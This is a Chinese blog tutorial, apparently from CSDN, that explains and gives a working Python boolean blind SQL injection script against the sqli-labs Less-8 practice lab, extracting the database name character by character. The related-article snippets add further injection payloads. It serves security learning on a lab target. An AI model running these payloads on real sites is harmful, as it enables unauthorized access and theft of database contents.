python实现sql注入脚本

最新推荐文章于 2024-05-23 16:17:43 发布
最新推荐文章于 2024-05-23 16:17:43 发布
阅读量1.7k 收藏 4
点赞数 4
文章标签: python sql oracle 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/czx1234566/article/details/134716460
版权

本人对写这个的脚本理解:

个人认为就是找特征,围绕着这个特征去写脚本。

接下来,我会以sql-labs的less-8靶场为例写一个布尔注入脚本。

首先先找特征:

输入id=1,这个返回的是正确的页面咯,那来看看错误的。

输入?id=1'

会发现页面少了这个

然后我们就以这个为特征,围绕着这个去写个脚本。

爆数据库长度的脚本

可以看到我这里是写了个死循环然后逐步增加这个dblen这个变量的值。

根据dblen这个变量的不断变化,然后用这不断变化返回值写了一个if判断去判断是否有这个返回值里是否有“You are in...........”字符串。

if判断到了这个页面返回值有“You are in...........”字符串他就会退出循环并返回值。

爆数据库名的脚本

这个原理同刚刚所说,只是换了个payload,i是用来代表数据库的长度。

b是代表这个没个字符的ascii的值。

脚本代码如下:

import requests
url='http://node5.anna.nssctf.cn:28084/Less-8/'
dblen=0
while True:
    payload=url+"?id=1' and length(database())="+str(dblen)+"--+"
    print(payload)
    if 'You are in...........' in requests.get(payload).text:
        break
    dblen+=1
print("当前数据库长度:",dblen)
dbname=''
for i in range(1,dblen+1):
    for b in range(33,127):
        payload2=url+"?id=1' and (ascii(substr(database(),"+str(i)+",1)))="+str(b)+"--+"
        if 'You are in...........' in requests.get(payload2).text:
            dbname+=chr(b)
            break
print("当前数据库名:",dbname)

之后的爆表名,列名,字段等,都类似,该下payload就行了,还有这个i的值是可以变的,如果不知道表名的长度,就给i的值的范围给大一点。

希望这篇文章能给到你们一些收获。

xise
关注
  • 4
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
基于pythonsql注入脚本
03-04
适合刚学pythonsql注入的人 import urllib2 import re
SQL住入原始脚本_SQL注入python脚本_
10-03
标题中的“SQL住入原始脚本”指的是利用SQL注入技术来编写或执行的原始SQL命令,而“SQL注入python脚本”则表明我们将探讨如何使用Python编写脚本来自动化这一过程。 SQL注入攻击主要有三种类型:直列注入、延时...
SQL盲注之python脚本自动化注入
菜鸟学安全的博客
12-18 1367
sql盲注无法使用sql语句注入,需要大量的判断语句或者延时注入。这样手动注入方式比较慢,手动发现注入点后可以使用python编写脚本注入。
手把手教你用Python轻松玩转SQL注入
最新发布
菜鸟学识的博客
05-23 1213
大家好,我是黄伟。相信大家经常有听到过SQL注入啥的,但是并不是特别了解;小编以前就是经常听别人说,但是自己啥都不懂,直到后来看了相关教材后才明白,原来是这么个东西,那么到底是什么东西了,又或者是不是个东西了?我们接着往下看。总的来说,SQL注入无非就是一段艰难险阻的路程,你可以发现但是别人也可以防御,虽然你发现要比较久的时间,但是人家防御却是很轻松,个人觉得得不偿失,不建议大家深入了解,只是做个简单的介绍了解下就好,至少你搜索技能因此而提高了不少吧。
pythonsql注入步骤_python 打造一个sql注入脚本 (一)
weixin_39809168的博客
11-30 503
0x00前言:昨天刚刚看完小迪老师的sql注入篇的第一章所以有了新的笔记。0x01笔记:sql注入原理:网站数据传输中,接受变量传递的值未进行过滤,导致直接带入数据库查询执行的操作。sql注入对渗透的作用:获取数据sql注入特性:攻击方法由数据库类型决定攻击结果由数据库决定漏洞代码:sql.php当我们在网页执行访问了:http://127.0.0.1/sql.php?x=1在数据库其实是这样的$...
sql注入python_Python--sql注入
weixin_39702799的博客
12-15 121
import pymysqlconn = pymysql.connect(host='211.149.218.16', user='jxz', password='123456', db='jxz', port=3306, charset='utf8')cur = conn.cursor(cursor=pymysql.cursors.DictCursor)name = 'zdq'sex = 0cu...
python番外篇--sql注入
aqovxg590751的博客
04-27 115
一、sql注入概念介绍 所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(恶意的)SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。 二、Python中防止...
pythonsql注入
weixin_30468137的博客
03-16 207
一、什么是sql注入:   SQL注入攻击指的是通过构建特殊的输入作为参数传入Web应用程序,而这些输入大都是SQL语法里的一些组合,通过执行SQL语句进而执行攻击者所要的操作,其主要原因是程序没有细致地过滤用户输入的数据,致使非法数据侵入系统。   根据相关技术原理,SQL注入可以分为平台层注入和代码层注入。前者由不安全的数据库配置或数据库平台的漏洞所致;后者主要是由于程序员对输入未进行细致...
Python填充SQL参数脚本.zip
05-28
在传统的SQL查询中,我们直接将变量或值插入到查询中,这可能导致SQL注入等安全风险。而参数化查询,也称为预编译语句或Prepared Statement,使用占位符来代表参数,然后在执行时替换为实际值。这种方式能有效防止...
基于Python的自动化SQL注入工具开发
04-29
在众多网络安全漏洞中,SQL注入漏洞以其门槛低、权限高、破坏性强的特点稳居 历年网络安全漏洞排行榜第一名,如何针对SQL注入漏洞进行防范和化解,保障个 人、组织乃至国家的信息安全成为了网络安全领域研究的一个...
pythonSQL注入仿写SQLMAP脚本.rar
09-26
Python SQL注入仿写SQLMAP脚本是针对网络安全领域的一个实践项目,主要涉及到的是利用Python编程语言来模拟著名的自动化SQL注入工具SQLMAP的功能。SQL注入是一种常见的网络安全漏洞,攻击者通过构造特殊的SQL语句来...
Python--sql注入
weixin_34236497的博客
02-02 92
import pymysqlconn = pymysql.connect(host='211.149.218.16', user='jxz', password='123456', db='jxz', port=3306, charset='utf8')cur = conn.cursor(cursor=pymysql.cursors.DictCursor)name = 'zdq'sex = 0cu...
python注入攻击_pythonsql注入
weixin_32818919的博客
02-21 608
coding:utf-8from pymysql importconnect#连接数据库conn=connect(host=‘localhost‘,port= 3306,user=‘root‘,passwd=‘root‘,db=‘ca‘,)#创建操作游标,创建了mysql的操作链接a=conn.cursor()#设置字符集为Utf-8a.execute(‘set names utf8‘)方法一fo...
pythonsql注入步骤_Pythonsql注入
weixin_39639260的博客
11-30 179
请问当以下代码在cmd运行的时候如何使用sql注入使得他可以接受任何账号密码#Runvia`pythoninjection.py`--compatiblewithPython2andPython3from__future__importprint_function#Ifraw...请问当以下代码在cmd运行的时候如何使用sql注入使得他可以接受任何账号密码# Run via `python inj...
Python自动化sql注入:布尔盲注_布尔盲注脚本,一次关于网络安全的面试经历
2401_84182636的博客
04-10 1024
id=1’ and ascii(substr((select column_name from information_schema.columns where table_name=‘表名’ limit 1,1),1,1))=102–+是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎扫码加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!id=1’ and ascii(substr((select 字段 from 表 limit 1,1),1,1))=1–+
python sql注入原理_SQL注入原理(转载)
weixin_39942351的博客
12-09 243
一、什么是sql注入呢?所谓SQL注入,就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令,比如先前的很多影视网站泄露VIP会员密码大多就是通过WEB表单递交查询字符暴出的,这类表单特别容易受到SQL注入式攻击.当应用程序使用输入内容来构造动态sql语句以访问数据库时,会发生sql注入攻击。如果代码使用存储过程,而这些存储过程作为包含未...
python sql 注入实例
weixin_45131345的博客
04-22 454
# from pymysql import * # conn = connect(host="127.0.0.1", port=3306, database="haha", user="root", password="123456", charset="utf8") # cur = conn.cursor() # key = " '' or '1'='1'" # cur.execute("se...
词达人小工具2
m0_61369360的博客
04-27 275
【代码】词达人小工具2。
如何用pythonsql注入脚本
02-21
编写SQL注入脚本的步骤可以概括如下:1. 了解SQL注入攻击原理; 2. 建立数据库连接; 3. 获得用户输入; 4. 构建恶意SQL语句; 5. 执行语句; 6. 获取返回结果。使用Python编写SQL注入脚本需要使用MySQLdb模块,它可以实现对MySQL数据库的操作,比如数据库连接、执行SQL语句等。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值